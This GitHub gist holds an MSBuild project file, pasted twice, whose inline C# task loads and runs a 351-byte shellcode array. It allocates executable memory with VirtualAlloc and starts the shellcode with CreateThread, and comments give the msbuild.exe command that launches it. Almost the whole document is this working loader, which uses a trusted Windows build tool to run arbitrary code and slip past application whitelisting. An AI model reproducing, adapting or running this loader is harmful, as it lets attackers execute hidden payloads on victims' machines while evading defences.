Reboare/gist:e7baa75017150d2886204525588dfb08

## gistfile1.txt
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee -->
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>

      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;
        public class ClassExample :  Task, ITask
        {
          private static UInt32 MEM_COMMIT = 0x1000;
          private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
          [DllImport("kernel32")]
            private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
            UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
          [DllImport("kernel32")]
            private static extern IntPtr CreateThread(
            UInt32 lpThreadAttributes,
            UInt32 dwStackSize,
            UInt32 lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
            );
          [DllImport("kernel32")]
            private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
            );
          public override bool Execute()
          {
	  	byte[] shellcode = new byte[351] {
0xd9,0xc9,0xb8,0x2e,0x63,0xc7,0x44,0xd9,0x74,0x24,0xf4,0x5d,0x31,0xc9,0xb1,
0x52,0x31,0x45,0x17,0x03,0x45,0x17,0x83,0xeb,0x67,0x25,0xb1,0x0f,0x8f,0x2b,
0x3a,0xef,0x50,0x4c,0xb2,0x0a,0x61,0x4c,0xa0,0x5f,0xd2,0x7c,0xa2,0x0d,0xdf,
0xf7,0xe6,0xa5,0x54,0x75,0x2f,0xca,0xdd,0x30,0x09,0xe5,0xde,0x69,0x69,0x64,
0x5d,0x70,0xbe,0x46,0x5c,0xbb,0xb3,0x87,0x99,0xa6,0x3e,0xd5,0x72,0xac,0xed,
0xc9,0xf7,0xf8,0x2d,0x62,0x4b,0xec,0x35,0x97,0x1c,0x0f,0x17,0x06,0x16,0x56,
0xb7,0xa9,0xfb,0xe2,0xfe,0xb1,0x18,0xce,0x49,0x4a,0xea,0xa4,0x4b,0x9a,0x22,
0x44,0xe7,0xe3,0x8a,0xb7,0xf9,0x24,0x2c,0x28,0x8c,0x5c,0x4e,0xd5,0x97,0x9b,
0x2c,0x01,0x1d,0x3f,0x96,0xc2,0x85,0x9b,0x26,0x06,0x53,0x68,0x24,0xe3,0x17,
0x36,0x29,0xf2,0xf4,0x4d,0x55,0x7f,0xfb,0x81,0xdf,0x3b,0xd8,0x05,0xbb,0x98,
0x41,0x1c,0x61,0x4e,0x7d,0x7e,0xca,0x2f,0xdb,0xf5,0xe7,0x24,0x56,0x54,0x60,
0x88,0x5b,0x66,0x70,0x86,0xec,0x15,0x42,0x09,0x47,0xb1,0xee,0xc2,0x41,0x46,
0x10,0xf9,0x36,0xd8,0xef,0x02,0x47,0xf1,0x2b,0x56,0x17,0x69,0x9d,0xd7,0xfc,
0x69,0x22,0x02,0x52,0x39,0x8c,0xfd,0x13,0xe9,0x6c,0xae,0xfb,0xe3,0x62,0x91,
0x1c,0x0c,0xa9,0xba,0xb7,0xf7,0x3a,0xcf,0x4d,0xf8,0x14,0xa7,0x53,0x06,0x68,
0x83,0xdd,0xe0,0x00,0xe3,0x8b,0xbb,0xbc,0x9a,0x91,0x37,0x5c,0x62,0x0c,0x32,
0x5e,0xe8,0xa3,0xc3,0x11,0x19,0xc9,0xd7,0xc6,0xe9,0x84,0x85,0x41,0xf5,0x32,
0xa1,0x0e,0x64,0xd9,0x31,0x58,0x95,0x76,0x66,0x0d,0x6b,0x8f,0xe2,0xa3,0xd2,
0x39,0x10,0x3e,0x82,0x02,0x90,0xe5,0x77,0x8c,0x19,0x6b,0xc3,0xaa,0x09,0xb5,
0xcc,0xf6,0x7d,0x69,0x9b,0xa0,0x2b,0xcf,0x75,0x03,0x85,0x99,0x2a,0xcd,0x41,
0x5f,0x01,0xce,0x17,0x60,0x4c,0xb8,0xf7,0xd1,0x39,0xfd,0x08,0xdd,0xad,0x09,
0x71,0x03,0x4e,0xf5,0xa8,0x87,0x7e,0xbc,0xf0,0xae,0x16,0x19,0x61,0xf3,0x7a,
0x9a,0x5c,0x30,0x83,0x19,0x54,0xc9,0x70,0x01,0x1d,0xcc,0x3d,0x85,0xce,0xbc,
0x2e,0x60,0xf0,0x13,0x4e,0xa1 };
	  	UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
              Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
              IntPtr hThread = IntPtr.Zero;
              UInt32 threadId = 0;
              IntPtr pinfo = IntPtr.Zero;
              hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
              WaitForSingleObject(hThread, 0xFFFFFFFF);
              return true;
          }
        }
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes shellcode. -->
	<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
	<!-- Save This File And Execute The Above Command -->
	<!-- Author: Casey Smith, Twitter: @subTee -->
	<!-- License: BSD 3-Clause -->
	<Target Name="Hello">
	<ClassExample />
	</Target>
	<UsingTask
	TaskName="ClassExample"
	TaskFactory="CodeTaskFactory"
	AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>

	<Code Type="Class" Language="cs">
	<![CDATA[
	using System;
	using System.Runtime.InteropServices;
	using Microsoft.Build.Framework;
	using Microsoft.Build.Utilities;
	public class ClassExample : Task, ITask
	{
	private static UInt32 MEM_COMMIT = 0x1000;
	private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
	[DllImport("kernel32")]
	private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
	UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
	[DllImport("kernel32")]
	private static extern IntPtr CreateThread(
	UInt32 lpThreadAttributes,
	UInt32 dwStackSize,
	UInt32 lpStartAddress,
	IntPtr param,
	UInt32 dwCreationFlags,
	ref UInt32 lpThreadId
	);
	[DllImport("kernel32")]
	private static extern UInt32 WaitForSingleObject(
	IntPtr hHandle,
	UInt32 dwMilliseconds
	);
	public override bool Execute()
	{
	byte[] shellcode = new byte[351] {
	0xd9,0xc9,0xb8,0x2e,0x63,0xc7,0x44,0xd9,0x74,0x24,0xf4,0x5d,0x31,0xc9,0xb1,
	0x52,0x31,0x45,0x17,0x03,0x45,0x17,0x83,0xeb,0x67,0x25,0xb1,0x0f,0x8f,0x2b,
	0x3a,0xef,0x50,0x4c,0xb2,0x0a,0x61,0x4c,0xa0,0x5f,0xd2,0x7c,0xa2,0x0d,0xdf,
	0xf7,0xe6,0xa5,0x54,0x75,0x2f,0xca,0xdd,0x30,0x09,0xe5,0xde,0x69,0x69,0x64,
	0x5d,0x70,0xbe,0x46,0x5c,0xbb,0xb3,0x87,0x99,0xa6,0x3e,0xd5,0x72,0xac,0xed,
	0xc9,0xf7,0xf8,0x2d,0x62,0x4b,0xec,0x35,0x97,0x1c,0x0f,0x17,0x06,0x16,0x56,
	0xb7,0xa9,0xfb,0xe2,0xfe,0xb1,0x18,0xce,0x49,0x4a,0xea,0xa4,0x4b,0x9a,0x22,
	0x44,0xe7,0xe3,0x8a,0xb7,0xf9,0x24,0x2c,0x28,0x8c,0x5c,0x4e,0xd5,0x97,0x9b,
	0x2c,0x01,0x1d,0x3f,0x96,0xc2,0x85,0x9b,0x26,0x06,0x53,0x68,0x24,0xe3,0x17,
	0x36,0x29,0xf2,0xf4,0x4d,0x55,0x7f,0xfb,0x81,0xdf,0x3b,0xd8,0x05,0xbb,0x98,
	0x41,0x1c,0x61,0x4e,0x7d,0x7e,0xca,0x2f,0xdb,0xf5,0xe7,0x24,0x56,0x54,0x60,
	0x88,0x5b,0x66,0x70,0x86,0xec,0x15,0x42,0x09,0x47,0xb1,0xee,0xc2,0x41,0x46,
	0x10,0xf9,0x36,0xd8,0xef,0x02,0x47,0xf1,0x2b,0x56,0x17,0x69,0x9d,0xd7,0xfc,
	0x69,0x22,0x02,0x52,0x39,0x8c,0xfd,0x13,0xe9,0x6c,0xae,0xfb,0xe3,0x62,0x91,
	0x1c,0x0c,0xa9,0xba,0xb7,0xf7,0x3a,0xcf,0x4d,0xf8,0x14,0xa7,0x53,0x06,0x68,
	0x83,0xdd,0xe0,0x00,0xe3,0x8b,0xbb,0xbc,0x9a,0x91,0x37,0x5c,0x62,0x0c,0x32,
	0x5e,0xe8,0xa3,0xc3,0x11,0x19,0xc9,0xd7,0xc6,0xe9,0x84,0x85,0x41,0xf5,0x32,
	0xa1,0x0e,0x64,0xd9,0x31,0x58,0x95,0x76,0x66,0x0d,0x6b,0x8f,0xe2,0xa3,0xd2,
	0x39,0x10,0x3e,0x82,0x02,0x90,0xe5,0x77,0x8c,0x19,0x6b,0xc3,0xaa,0x09,0xb5,
	0xcc,0xf6,0x7d,0x69,0x9b,0xa0,0x2b,0xcf,0x75,0x03,0x85,0x99,0x2a,0xcd,0x41,
	0x5f,0x01,0xce,0x17,0x60,0x4c,0xb8,0xf7,0xd1,0x39,0xfd,0x08,0xdd,0xad,0x09,
	0x71,0x03,0x4e,0xf5,0xa8,0x87,0x7e,0xbc,0xf0,0xae,0x16,0x19,0x61,0xf3,0x7a,
	0x9a,0x5c,0x30,0x83,0x19,0x54,0xc9,0x70,0x01,0x1d,0xcc,0x3d,0x85,0xce,0xbc,
	0x2e,0x60,0xf0,0x13,0x4e,0xa1 };
	UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
	MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
	IntPtr hThread = IntPtr.Zero;
	UInt32 threadId = 0;
	IntPtr pinfo = IntPtr.Zero;
	hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
	WaitForSingleObject(hThread, 0xFFFFFFFF);
	return true;
	}
	}
	]]>
	</Code>
	</Task>
	</UsingTask>
	</Project>